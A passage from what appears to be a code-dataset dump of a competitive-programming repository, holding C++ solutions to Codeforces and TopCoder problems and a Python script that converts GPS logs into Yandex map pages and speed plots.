<bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n void build(vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l];\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n };\n\n segmentTree(vector<T>& a, F g, T ne = 0)\n {\n n = a.size();\n t.resize(n * 4);\n f = g;\n if (ne != 0)\n NEITRAL_ELEMENT = ne;\n else\n if (f(2, 4) == 6)\n NEITRAL_ELEMENT = 0;\n else\n if (f(-2, 10) == -2)\n NEITRAL_ELEMENT = numeric_limits<T>::max();\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n if (l > r)\n return NEITRAL_ELEMENT;\n if (l == tl && r == tr)\n return t[v];\n int tm = (tl + tr) / 2;\n return f(get(v * 2, tl, tm, l, min(r, tm)), get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r));\n }\n\n void update(int position, T value)\n {\n update(1, 0, n - 1, position, value);\n }\n\n void update(int v, int tl, int tr, int position, T value) \n {\n if (tl == tr)\n t[v] = value;\n else \n {\n int tm = (tl + tr) / 2;\n if (position <= tm)\n update(v * 2, tl, tm, position, value);\n else\n update(v * 2 + 1, tm + 1, tr, position, value);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi p(n), q(n), ans(n), r(n + 1);\n readln(p, q);\n 
fori(n)\n r[p[i]] = i;\n segmentTree<int> s(p, [](int x, int y) { return max(x, y); }, numeric_limits<int>::min());\n set<int> indices;\n int all = 0;\n fori(n)\n {\n ans[i] = s.get(0, n - 1);\n all = max(all, q[i] - 1);\n int mx = all;\n if (auto it = indices.upper_bound(q[i] - 1); it != indices.end())\n mx = *it;\n int t = s.get(0, mx);\n int x = r[t];\n s.update(x, 0);\n indices.insert(x);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.2763448655605316, "alphanum_fraction": 0.28739866614341736, "avg_line_length": 30.55813980102539, "blob_id": "f5a4308e4fedce19b4055b8391840f250efa9cee", "content_id": "c109bd49c7b8fe91e363a97787fa4015a2b9c6e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1357, "license_type": "no_license", "max_line_length": 83, "num_lines": 43, "path": "/TopCoder/TC655/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define 
forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\nclass BichromeBoard \n{\npublic:\n string ableToDraw(vector <string> board) \n {\n vector<int> dx = { 1, 0, -1, 0};\n vector<int> dy = { 0, 1, 0, -1};\n int n = board.size();\n int m = board[0].size();\n auto f = [n, m](int i, int j){ return i >= 0 && j >= 0 && i < n && j < m;};\n while (true)\n {\n bool ch = false;\n fori(n)\n forj(m)\n if (board[i][j] != '?')\n {\n char c = board[i][j] == 'W' ? 'B' : 'W';\n for (int u = 0; u < 4; u++)\n if (f(i + dx[u], j + dy[u]))\n {\n char d = board[i + dx[u]][j + dy[u]];\n if (d == '?')\n board[i + dx[u]][j + dy[u]] = c,\n ch = true;\n else\n if (d != c)\n return \"Impossible\";\n }\n }\n if (!ch)\n break;\n }\n return \"Possible\";\n }\n};\n" }, { "alpha_fraction": 0.40578359365463257, "alphanum_fraction": 0.4253731369972229, "avg_line_length": 26.090251922607422, "blob_id": "453f64e9b1801292115d9c16d46be05317a1dc1d", "content_id": "c101113f9f1bc8177d6fc13646c1f8948676ce82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7504, "license_type": "no_license", "max_line_length": 174, "num_lines": 277, "path": "/CodeForce/1758/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? 
l : r;\n}\n\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n //vector<T> pos;\n function<T(const T&, const T&)> f = [](const T& a, const T& b) { return min(a, b); };\n T NEITRAL_ELEMENT = numeric_limits<T>::max();\n \n void push(int v, int tl, int tr)\n {\n if (add[v] == 0) return;\n\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n\n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n {\n t[v] = a[l];\n //pos[v] = l;\n }\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n //pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n push(v, tl, tr);\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n push(v, tl, tr);\n if (l > r) return NEITRAL_ELEMENT;\n\n if (tl == l && tr == r)\n return t[v];\n else \n {\n int tm = (tl + tr) / 2;\n T left = get(v * 2, tl, tm, l, min(r, tm));\n T right = get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r);\n return 
f(left, right);\n }\n }\n\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n int N = n * 2;\n vi a(N + 10, 0);\n set<pii> segments;\n segmentTree<int> tree(a);\n fori(N)\n tree.update(i, N, -1);\n\n auto getSegment = [&](int x) -> optional<pii> {\n if (segments.empty())\n return {};\n auto it = segments.lower_bound({x + 1, x + 1});\n if (it == segments.begin())\n return {};\n --it;\n if (it->second >= x)\n return *it;\n return {};\n };\n\n fori(n)\n {\n ints(x); --x;\n vector<pii> add, rem;\n auto it = getSegment(x);\n\n if (a[x] == 0)\n {\n a[x] = 1;\n tree.update(x, N, 2);\n\n int l = x;\n int r = x;\n if (it)\n {\n l = it->first;\n r = it->second;\n rem.pb(*it);\n }\n\n if (auto prev = getSegment(x - 1); prev && prev->second == x - 1)\n {\n l = prev->first;\n rem.pb(*prev);\n }\n\n forn(q, it ? 2 : 1)\n {\n ++r;\n if (auto nxt = getSegment(r); nxt && nxt->first == r)\n {\n r = nxt->second + 1;\n rem.pb(*nxt);\n }\n }\n\n if (auto nxt = getSegment(r + 1); nxt)\n {\n r = nxt->second;\n rem.pb(*nxt);\n }\n add.pb({l, r});\n }\n else\n {\n a[x] = 0;\n tree.update(x, N, -2);\n int l = it->first;\n int r = it->second;\n if (r - l > 2)\n {\n int p = l == 0 ? 
0 : tree.get(l - 1, l - 1);\n int m = binSearch(l, r, [&](int m) {\n return tree.get(l, m) - p <= -2;\n });\n if (m - 2 > l)\n add.pb({l, m - 2});\n if (m + 1 < r)\n add.pb({m + 1, r});\n }\n\n rem.pb(*it);\n }\n\n writeln(rem.size());\n for (auto& [x, y]: rem) segments.erase({x, y}), ++x, ++y;\n if (rem.size()) writeln(rem);\n writeln(add.size());\n for (auto& [x, y]: add) segments.insert({x, y}), ++x, ++y;\n if (add.size()) writeln(add);\n cout.flush();\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3063241243362427, "alphanum_fraction": 0.3379446566104889, "avg_line_length": 23.119047164916992, "blob_id": "899bb5d376d37081326ee06c891b1caa8569a152", "content_id": "1dfd34729ee23a1a17a8f49be128c6d014e7300c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": 
"#include <bits/stdc++.h>\n \nusing namespace std;\n \nconst int MaxN = 1000239;\nmap <int, int> m;\nint a[MaxN], t, n, m1, ht[MaxN], x;\npair<int, int> h[MaxN];\nint main(){\n cin >> t;\n while (t --> 0){\n cin >> n >> m1;\n for (int i = 0; i < n; ++i){\n cin >> ht[i];\n h[i] = make_pair(ht[i], i);\n }\n sort (h, h + n);\n int cnt = 0;\n for (int i = n - 1; i >= 0; i--){\n int num = h[i].second, height = h[i].first, ssd = 0;\n if (num && ht[num - 1] >= height){\n ssd++;\n }\n if (num != n - 1 && ht[num + 1] > height){\n ssd++;\n }\n if (!ssd)\n cnt++;\n if (ssd == 2)\n cnt--;\n m[height] = cnt;\n }\n m[1000000009] = 0;\n while(m1 --> 0){\n cin >> x;\n int c = (m.upper_bound(x))->first;\n cout << m[c] << \" \";\n }\n m.clear();\n cout << endl;\n }\n}" }, { "alpha_fraction": 0.5519927740097046, "alphanum_fraction": 0.564673900604248, "avg_line_length": 32.05389404296875, "blob_id": "d217f3f3dcffc7adb1f358b1ccbb02b5925e8f9e", "content_id": "349bf0abcc730d6c98bd29bb9db908595ea1420b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5520, "license_type": "no_license", "max_line_length": 165, "num_lines": 167, "path": "/CodeForce/gym/101104/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb 
push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//point\n#define pointtt template<typename T>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? (a.begin == b.begin ? 
dist(z, a) < dist(z, b) : a.begin > b.begin) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n int begin;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-() { return point(-x, -y); }\n T operator*(point b) { return x * b.x + y * b.y; }\n T operator^(point b) { return x * b.y - y * b.x; }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y<<\" \"<<a.begin;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(point<T>&a,point<T>&b,point<T>&c){return{abs((a+-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n//Igorjan\n\nvoid run()\n{\n ints(n);\n point<int> light;\n vector<pair<point<int>, point<int>>> segments(n);\n readln(light);\n if (n == 0)\n {\n writeln(1);\n return;\n }\n readln(segments);\n vector<point<int>> points;\n fori(n)\n {\n if (orientation(light, segments[i].first, segments[i].second) == 1)\n swap(segments[i].first, segments[i].second);\n\n segments[i].first.begin = 1;\n segments[i].second.begin = -1;\n points.pb(segments[i].first);\n points.pb(segments[i].second);\n }\n sortByPolarAngle(points, light, int);\n int b = 0;\n int ans = 1;\n fori(points.size())\n {\n b += points[i].begin;\n ans += b == 0;\n }\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / 
CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5469561219215393, "alphanum_fraction": 0.569136381149292, "avg_line_length": 34.61344528198242, "blob_id": "140c60763f754cfc33d5e34b71dffec4c4ee99ec", "content_id": "4ff4e26e094312e3ecfc917d4d486faae73f815e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4238, "license_type": "no_license", "max_line_length": 192, "num_lines": 119, "path": "/scripts/sonyToYandex.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import xmltodict\nimport re\nimport os\nimport time\nimport datetime\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom library import *\n\nurl = 'https://static-maps.yandex.ru/1.x/?lang=ru_RU&l=map&pl='\n\ndef degsToDegs(f):\n degs = int(f[:2])\n mins = int(f[2:4])\n secs = int(f[5:7])\n msecs = int(f[7:9])\n return degs + mins / 60 + secs / 60 / 100 + msecs / 60 / 100 / 100\n\ndef getTimeFromString(s, format):\n return int(time.mktime(datetime.datetime.strptime(s, format).timetuple()))\n\n\ndef gpsToHtml(filename, yandex, output):\n rl = filename.readlines()\n coords = []\n if filename.name.endswith('.gpx'):\n parsed = xmltodict.parse(''.join(rl))['gpx']\n title = parsed['metadata']['name']\n lines = 
parsed['trk']\n if not 'trkseg' in lines:\n return\n else:\n lines = lines['trkseg']\n if type(lines) != list: lines = [lines]\n for segment in lines:\n ps = segment['trkpt']\n if type(ps) != list: ps = [ps]\n for line in ps:\n t = getTimeFromString(line['time'][:-1] + '000', '%Y-%m-%dT%H:%M:%S.%f')\n coords.append([t, line['@lat'], line['@lon'], float(line.get('extensions', {'geotracker:meta': {}}).get('geotracker:meta').get('@s', 0)) * 3.6, line['ele']])\n start = coords[0][0]\n else:\n start = rl[0].split('/')[3][:-4]\n start = getTimeFromString(start, '%Y%m%d%H%M%S')\n title = datetime.datetime.fromtimestamp(start).strftime('%Y-%m-%d %H:%M:%S')\n lines = list(map(lambda line: line[:-1].split(','), filter(lambda line: line.startswith('$GPRMC'), rl)))\n for line in lines:\n t = line[9][:4] + '20' + line[9][4:] + line[1].split('.')[0]\n t = getTimeFromString(t, '%d%m%Y%H%M%S') + int(line[1][7:]) / 1000\n coords.append([t, degsToDegs(line[3]), degsToDegs(line[5]), float(line[7]) * 1.852])\n\n points = []\n speeds = []\n commands = []\n hs = []\n last = 0\n lastTime = start\n for t, x, y, s, *h in coords:\n if h: hs.append(int(h[0]))\n points.append([str(x)[:9], str(y)[:9]])\n speeds.append(int(s))\n shift = 2\n commands.append(f\"drawtext=text='{int(last)} km/h':enable='between(t,{max(0, lastTime - start - shift):.2f},{max(0, t - start - shift):.2f})':x=10:y=H-th-10:fontsize=40:fontcolor=red\")\n last = s\n lastTime = t\n\n points = ', '.join(map(lambda x: '[' + ', '.join(x) + ']', points))\n if points:\n output.write(''.join(yandex).replace('POINTS', points).replace('TITLE', title))\n output.close()\n else:\n os.unlink(output.name)\n filename.close()\n print(', \\\\\\n'.join(commands))\n\n title = output.name.rsplit('/', 1)[-1]\n import matplotlib.pyplot as plt\n\n fig, ax1 = plt.subplots()\n\n color = 'tab:blue'\n ax1.plot(speeds, color = color)\n ax1.set_title(title)\n ax1.set_xlabel('Dist')\n ax1.set_ylabel('Speed', color = color)\n ax1.tick_params(axis = 'y', 
labelcolor = color)\n\n if hs:\n color = 'tab:red'\n ax2 = ax1.twinx()\n ax2.plot(hs, color = color)\n ax2.set_ylabel('Height', color = color)\n ax2.tick_params(axis = 'y', labelcolor = color)\n\n fig.tight_layout()\n plt.savefig(output.name.replace(r'\\s', '') + '.png', dpi=900);\n plt.show()\n\n\[email protected]()\[email protected]('filename', required=True, type=click.File('r'), nargs=1)\[email protected]('-y', '--yandex', help='index', type=click.File('r'), default='./yandexMap/index.html')\ndef getMap(filename, yandex):\n gpsToHtml(filename, yandex.readlines(), open(filename.name.rsplit('.', 1)[0] + '.html', 'w'))\n\[email protected]()\[email protected]('dir', required=True, type=click.Path(file_okay=False), nargs=1)\[email protected]('-y', '--yandex', help='index', type=click.File('r'), default='./yandexMap/index.html')\ndef getMaps(dir, yandex):\n html = yandex.readlines()\n for f in listdir(dir):\n filename = join(dir, f)\n if isfile(filename) and (filename.endswith('.LOG') or filename.endswith('.gpx')):\n gpsToHtml(open(filename, 'r'), html, open(filename.rsplit('.', 1)[0] + '.html', 'w'))\n yandex.close()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.39518633484840393, "alphanum_fraction": 0.41149067878723145, "avg_line_length": 18.223880767822266, "blob_id": "60c3d25c8b83591cefa841e82fe21d47ab91b327", "content_id": "019a0135f1a0fe0b38a1ed1151ad9f6b6f0a0571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1288, "license_type": "no_license", "max_line_length": 53, "num_lines": 67, "path": "/trash/typycal_proger/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v)\n{\n if (used[v])\n return false;\n used[v] = true;\n 
for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (d[u] == -1 || dfs(d[u]))\n {\n d[u] = v;\n return true;\n }\n }\n return false;\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n edges.resize(n + 1);\n int x, y = 1;\n char s[5001][101];\n char g;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%s\\n\", &s[i + 1]);\n while (true)\n {\n scanf(\"%d%c\", &y, &g);\n edges[i + 1].push_back(y);\n if (g == '\\n')\n break;\n }\n }\n d.resize(n + 1, -1);\n int c = 0;\n for (int i = 1; i <= n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n if (dfs(i))\n c++;\n }\n for (int i = 1; i <= n; i++)\n printf(\"%s%c\", s[d[i]], i == n ? '\\n' : ' ');\n// printf(\"%d\", c);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.4669749140739441, "alphanum_fraction": 0.4995596706867218, "avg_line_length": 28.88157844543457, "blob_id": "f2e4345bb73b22cf8f4ee6f34e4437768143a359", "content_id": "57fb72054c7552d0fc68774376a8b03326975da8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 174, "num_lines": 152, "path": "/CodeForce/1746/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n vi a(n);\n iota(all(a), 1);\n\n auto ask = [&](vector<int>& x) {\n writeln(\"?\", x.size(), x);\n string s;\n readln(s);\n return s == \"YES\";\n };\n\n vector<int> x[4], nxt;\n\n auto makeNext = [&](int i, int j = -1, int k = -1) {\n nxt.clear();\n copy(all(x[i]), back_inserter(nxt));\n if (j != -1)\n copy(all(x[j]), back_inserter(nxt));\n if (k != -1)\n copy(all(x[k]), back_inserter(nxt));\n };\n\n auto dump = [&]() {\n fori(4) x[i].clear();\n };\n\n while (a.size() > 3)\n {\n dump();\n int q = a.size() / 4;\n int m1 = q;\n int m2 = q * 2;\n int m3 = q * 3;\n\n copy(a.begin(), a.begin() + m1, back_inserter(x[0]));\n copy(a.begin() + m1, a.begin() + m2, back_inserter(x[1]));\n copy(a.begin() + m2, a.begin() + m3, back_inserter(x[2]));\n copy(a.begin() + m3, a.end(), back_inserter(x[3]));\n makeNext(0, 1);\n int a0 = 